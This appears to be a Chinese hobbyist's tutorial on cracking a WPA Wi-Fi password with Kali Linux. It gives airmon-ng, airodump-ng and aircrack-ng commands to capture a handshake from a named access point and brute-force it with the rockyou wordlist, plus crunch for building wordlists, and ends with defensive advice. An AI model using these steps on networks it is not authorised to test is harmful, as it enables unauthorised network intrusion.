题记
大家好啊,我也知道我写一堆东西也没啥人看,这只是自娱自乐,但也是鞭策我的一种方式,也是让我回顾的便捷途径。这些天一直看大佬讲的挖src实战经验,也没时间记笔记。好几个实战我都想实操,奈何工具还没到我手,小米wifi刚到,下一个就是badusb了,在下个就是vps了,我已经迫不及待的准备把我的靶场与想法实现了。真想体验体验一键上线cs的感觉的。物理黑客也是黑客(哼)。不断学习,我将会是中国最伟大的黑客(中二脸)。是真的,我越来越认为网安是我们越来越重视的东西,这东西我们落下美国太多年了,加强网安建设自我辈开始。
一、准备工作
1、usb无线网卡,我买的小米随身wifi,即插即用,不用安装驱动。
2、vm服务全部开启。
3、kali设为桥接模式,桥接模式依赖的是网卡。
二、操作步骤
1、开启虚拟机,把kali上线。
2、插入酷似usb的随身wifi。
3、ifconfig看一下网卡接口,名字一般是wlan0.
4、开启无线网卡监听模式
airmon-ng start wlan0,之后在查看网卡接口,发现名字变了。
5、查看周围网络
airodump-ng wlan0mon
中间这个是目标wifi,抓到wifi就Ctrl+c停止。这时候需要注意的是此wifi的信道为3,所以我们要把网卡监听信道调成3,airodump-ng wlan0mon -c 3。
6、创建一个目录,用来存放抓到的握手包文件。
mkdir pojie
7、开始抓包
airodump-ng -c 3 --bssid B8:3A:08:C5:88:71 -w pojie/ wlan0mon 注意:信道不能错,文件抓到包后会存在pojie目录下,生成一个-01.cap文件。
8、另开一个窗口进行攻击,使链接wifi的设备重连wifi,我们抓取中间包。
9、回到之前窗口我们可以看到成功抓到包了。
10、结束掉抓包后开始暴力破解。
aircrack-ng -a2 -b B8:3A:08:C5:88:71 -w /usr/share/wordlists/rockyou.txt pojie/-01.cap
注意:初次使用字典需要解压。
gzip -d /usr/share/wordlists/rockyou.txt.gz
或者自己传一个字典去干爆密码。
11、破解成功图如下(密码被打马赛克,其实不重要,总不能来我家蹭网吧)。
12、关闭网卡监听模式,然后就能上网了。
airmon-ng stop wlan0mon
三、爆破字典
1、在kali里,是默认自带了字典的,分别放在下面三个文件中:
/usr/share/wordlist
/usr/share/wfuzz/wordlist
/usr/share/seclists,有一个password
2、生成一个指定文件名的密码文件,密码长度为1到8位
crunch 1 8 123456 -o mimam/mima.txt
3、自己网上搜集搜集,好字典才是王道。
四、注意事项
1、防止这种攻击最简单的方法是设置贼复杂贼长的密码;
2、不要使用WEP加密方式,非常容易被破解;
3、监听信道和wifi信道一定要保持一致。
参考链接:https://mp.weixin.qq.com/s/VuQ0eIm1zTuP5bzYGvFmBQ